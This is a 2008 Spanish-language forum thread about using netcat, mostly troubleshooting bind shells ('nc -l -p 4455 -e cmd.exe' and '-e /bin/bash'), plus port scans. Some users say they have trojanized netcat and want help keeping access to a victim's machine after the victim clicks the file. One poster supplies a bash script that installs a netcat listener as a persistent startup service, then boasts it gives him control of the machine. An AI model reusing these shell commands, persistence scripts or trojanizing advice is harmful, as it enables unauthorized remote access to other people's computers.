Jugando con netcat

D4RIO · 24 Abril 2008, 23:15 PM

drzboii94:
Amigo decidite... tu post decia:

Citarno entiendo cual archivo es que tengo que anadir a .rrar

te respondi que leas y me pones:

CitarLo ley entero pero lo que pasa es que mira lo que me sale despues que pongo
Citar
NC -VV -L -P 80

y tu imagen...
¿Estas creando el RAR o intentando una conexion desastrosa?¿Porque no aparece localhost o 127.0.0.1 en ningun lado de tu salida?¿Sabes como funciona NetCat?¿Porque no intentas con un script Perl para ver si podes así, o te haces un programa en C++?

Esa es la cosa... no podes postear cada vez que haces un paso y no te sale... tenes que intentar resolverlo primero por vos mismo... GOOGLE!!!

drzboii94 · 27 Abril 2008, 04:58 AM

lol, Gracias por trarme de ayudar pero ya resolvi el problema hace ufff

vitaepe · 28 Abril 2008, 01:36 AM

esta interesante el tema pero hice lo que mencionan en la primera parte en la consola de ubuntu
vitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

luego de eso hice un nmap al sistema
vitaepe@vitaepe-desktop:~$ nmap 192.168.1.34

Starting Nmap 4.20 ( http://insecure.org ) at 2008-04-27 18:08 PET
All 1697 scanned ports on 192.168.1.34 are closed
no abrio ningun puerto en mi ordenador, alguien sabe a que se debe?

D4RIO · 28 Abril 2008, 03:30 AM

Citarvitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

Eso abre el 4455 a la escucha pero cmd.exe es el shell de Windows! En linux deberías poner "/bin/bash"...

Hiciste un escaneo con nmap y venis con un diagnostico totalmente errado, fruto de no hacer las pruevas que deberías... en pimer lugar nmap tiene muchísimas opciones, pero así y todo no es ese el camino para ver si el puerto está abierto... para lo que más sirve nmap es para detección remota de SO.

Mira... hace "nc -z -vv 192.168.1.34 4443-4446" y vas a ver que no era como creias. O bien "nc -vv localhost 4455".

A demás si usaras -vv en el comando que indicas verías que sí está escuchando... si no lo hiciera mandaría un error.

vitaepe · 28 Abril 2008, 04:09 AM

vitaepe@vitaepe-desktop:~$ nc -z -vv 192.168.1.34 4443-4446
192.168.1.34: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.34] 4446 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4445 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4444 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4443 (?) : Connection refused
sent 0, rcvd 0
vitaepe@vitaepe-desktop:~$ nc -vv localhost 4455
localhost [127.0.0.1] 4455 (?) : Connection refused
sent 0, rcvd 0

Estos son los resultados, voy a seguir probando

D4RIO · 28 Abril 2008, 05:48 AM

Eso era mientras esto esta corriendo en otro terminal...

Citarvitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

A demás, el nro de IP era el que usabas en ese entonces, ahora tenes que usar el que corresponda...

_{Yo no entiendo la gracia de hacer algo sin saber qué se está haciendo...}

vitaepe · 28 Abril 2008, 05:57 AM

_{Yo no entiendo la gracia de hacer algo sin saber qué se está haciendo...}
[/quote]

si te incomoda lo que digo, pues simple ignoralo pero estos comentarios, no ayudan si no incomodan, alguien que sea mas claro, mejor dicho que explique cual es mi error.

Compumdp · 28 Abril 2008, 17:29 PM

Hola, lei todo, hice todo, anda bien, pero tengo un problema, solo puedo acceder a la maquina cuando la victima clickea el archivo, despues cuando me desconecto no logro ingresar mas, hasta que la victima vuelva a clickear el archivo, estuve buscando sobre esto pero no encontre respuestas, si me pueden dar una mano, muchas gracias!

::Neo:: · 28 Abril 2008, 18:11 PM

ok, he troyanizado el netcat, pero cuando lo abro en otro pc, me sale el pestañeo del CMD y despues me sale un cartel de estos de error en el que pone: "Windows no puede encontrar el archivo "iexplore.exe". Asegurese de que la ruta y el nombre del archivo esta bien escrito y vuelva a intentarlo. Para buscar un archivo haga clic en inicio y luego buscar." e buscado por google y no encuentro la solucion, porfavor ayudenme

. gracias de antemano

D4RIO · 28 Abril 2008, 20:02 PM

vitaepe:
Te lo explike perfectamente bien perono creo que en realidad sepas lo que haces.
Si ejecutas lo siguiente:

Citarvitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

queda el 4455 a la escucha... (con el ignorantazo de que cmd.exe NO ES EL SHELL DE LINUX... pero bueh)
Lo ideal seria que pongas:

Código [Seleccionar]

nc -l -vv -e /bin/bash -p 4455

Y mientras eso se esta ejecutando en un terminal abris otro y pones

Código [Seleccionar]

nc -z -vv localhost 4443-4446

Pero si no lo entendes no tiene ninguna gracia, es más, yo te diria que no juegues con revolver si no sabes usar armas porque vas a terminar pegandote un tiro... yo te podria decir que te facilitas la vida poniendo esto en un script y ejecutandolo con bash:

Código (bash) [Seleccionar]

#!/bin/bash

cat << EOF >> /etc/init.d/ncman.sh
#!bin/bash

case $1 in
start)
    nc -l -vv -p 4455 &;
;;
stop)
    killall nc;
;;
*)
    echo "JoHoHo!";
;;
esac

exit 0;

EOF

ln -s /etc/init.d/ncman.sh /etc/rc5.d/S99ncman;
chmod +x /etc/init.d/ncman.sh;

exit 0;

Y vos como si nada lo podes llegar a hacer por no saber con que te metes. Primero aprende las bases... no es bardo, es un consejo, porque Linux sera muy seguro pero si no sabes como se hacen las cosas... estar seguro de tu seguridad solamente te sirve para estar más inseguro. Con eso yo me hago del control de tu máquina cuando se me canta.